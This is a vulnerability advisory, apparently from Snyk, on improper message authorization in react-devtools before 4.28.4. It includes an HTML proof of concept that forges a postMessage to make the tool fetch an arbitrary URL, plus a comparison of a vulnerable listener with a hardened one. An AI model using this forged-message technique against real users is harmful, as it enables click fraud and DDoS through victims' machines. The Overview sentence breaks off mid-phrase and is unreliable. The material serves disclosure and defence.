Improper Authorization Affecting react-devtools package, versions <4.28.4

Severity: medium

Snyk CVSS
  • Attack Complexity: Low
  • Threat Intelligence: Exploit Maturity Proof of concept; EPSS 0.05% (16th percentile)

NVD
  • 6.5 medium

  • Snyk ID SNYK-JS-REACTDEVTOOLS-6023998
  • published 22 Oct 2023
  • disclosed 19 Oct 2023
  • credit Calum Hutton - Snyk Research Team

How to fix?

Upgrade react-devtools to version 4.28.4 or higher.

Overview

react-devtools is a package for using React DevTools outside of the browser.

Affected versions of this package are vulnerable to Improper Authorization through the window.addEventListener('message', <listener>) function. By exploiting this vulnerability, an attacker can generate clicks and revenue or initiate a Distributed Denial of Service (DDoS) attack without the victims’ knowledge or consent by sending a message that triggers a fetch request to an arbitrary

PoC


<!DOCTYPE html>
<html>
<head>
  <script src="https://unpkg.com/react@18/umd/react.development.js" crossorigin></script>
  <script src="https://unpkg.com/react-dom@18/umd/react-dom.development.js" crossorigin></script>
  <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
</head>
<body>

<div id="mydiv"></div>

<script type="text/babel">
  function Hello() {
    return <h1>Hello World!</h1>;
  }

  const container = document.getElementById('mydiv');
  const root = ReactDOM.createRoot(container);
  root.render(<Hello />)
</script>

<script>
  // The vulnerable listener authorizes on two fields inside the message body
  // (the 'react-devtools-extension' source tag and the 'fetch-file-with-cache'
  // type), both of which any page that can post to the window can supply,
  // and then fetches whatever URL the payload names.
  function sendBrowserMsg() {
    let msg = {
      source: 'react-devtools-extension',
      payload: {
        type: 'fetch-file-with-cache',
        url: 'https://www.google.com'
      }
    };
    console.log(`Sending msg from browser: ${JSON.stringify(msg)}`);
    // Target origin "*": the message is delivered regardless of the receiving origin.
    postMessage(msg, "*");
  }
</script>

<form>
  <button type="button" id="submit" onclick="sendBrowserMsg()">Go!</button>
</form>

</body>
</html>
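A minimal model of the message listener described in the Overview and targeted by the PoC above, written for this page as an added example (it is not react-devtools' own code and does not reproduce the fix shipped in 4.28.4): the vulnerable shape authorizes on the forgeable `source` tag in the message body, while the hardened shape authorizes on `event.origin` and constrains the URL. `ALLOWED_ORIGIN`, `ALLOWED_HOSTS`, the event objects and the fetch stub are assumptions constructed so the code runs offline.

```javascript
// Added example, not react-devtools' own code: a minimal model of the window
// 'message' listener in its vulnerable shape and a hardened shape.
// ALLOWED_ORIGIN and ALLOWED_HOSTS are assumptions; the real listener's
// trusted origin and fetch targets depend on how the tool is deployed.

const EXPECTED_SOURCE = 'react-devtools-extension';
const ALLOWED_ORIGIN = 'https://devtools.example';   // assumption
const ALLOWED_HOSTS = ['localhost', '127.0.0.1'];     // assumption

// Records URLs instead of performing network I/O, so both handlers are testable.
function makeFetchRecorder() {
  const calls = [];
  return { calls, fetch: (url) => { calls.push(url); return Promise.resolve(); } };
}

// Vulnerable shape: authorizes on a string tag inside the message body, which
// any sender can forge, then fetches whatever URL the body names.
function vulnerableListener(event, fetchImpl) {
  const { source, payload } = event.data || {};
  if (source !== EXPECTED_SOURCE) return false;
  if (!payload || payload.type !== 'fetch-file-with-cache') return false;
  fetchImpl(payload.url);
  return true;
}

// Hardened shape: authorizes on event.origin, which the browser sets and the
// sender cannot forge, and only fetches http(s) URLs on an allowlisted host.
function hardenedListener(event, fetchImpl,
                          allowedOrigin = ALLOWED_ORIGIN, allowedHosts = ALLOWED_HOSTS) {
  if (event.origin !== allowedOrigin) return false;
  const { source, payload } = event.data || {};
  if (source !== EXPECTED_SOURCE) return false;
  if (!payload || payload.type !== 'fetch-file-with-cache') return false;
  let url;
  try { url = new URL(String(payload.url)); } catch (e) { return false; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  if (!allowedHosts.includes(url.hostname)) return false;
  fetchImpl(url.href);
  return true;
}

// Runs one event through both handlers; returns [vulnerableFetches, hardenedFetches].
function compare(event) {
  const a = makeFetchRecorder(), b = makeFetchRecorder();
  vulnerableListener(event, a.fetch);
  hardenedListener(event, b.fetch);
  return [a.calls, b.calls];
}
```

Feeding `compare` the PoC's message with a cross-origin `event.origin` shows the vulnerable handler fetching `https://www.google.com` while the hardened handler fetches nothing.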